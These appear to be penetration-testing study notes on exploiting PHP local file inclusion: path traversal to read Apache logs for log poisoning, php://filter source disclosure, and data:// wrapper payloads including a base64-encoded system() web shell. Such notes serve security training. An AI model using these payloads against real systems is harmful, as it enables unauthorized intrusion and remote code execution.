# Example 1 - LFI via Log Poisoning  `User Agent` is included in the log entry. ```bash kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log ... 192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0" ... ```   # PHP Wrappers  - bypass filters or obtain code execution via File inclusion vulnerabilities in PHP web apps. - [https://www.php.net/manual/en/wrappers.php](https://www.php.net/manual/en/wrappers.php) ### php://filter  ```bash php://filter # include the contents of a file # wrapper http://example.com/wook/index.php?page=php://filter/resource=admin.php # converts to base64 http://example.com/wook/index.php?page=php://filter/convert.base64-encode/resource=admin.php ``` ### data://  - To exploit it, the _allow_url_include_ setting needs to be enabled - used to embed data elements as plaintext or base64-encoded data in the running web app's code. - offers an alternative method when we cannot poison a local file with PHP code. ```bash data:// # achieve code execution # wrapper curl "http://example.com/wook/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>" # when WAF or other security mechanisms are in place echo -n '<?php echo system($_GET['cmd']); ?>' | base64 PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg== curl "http://example.com/wook/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls" ``` ### Wordlists ```bash https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt ```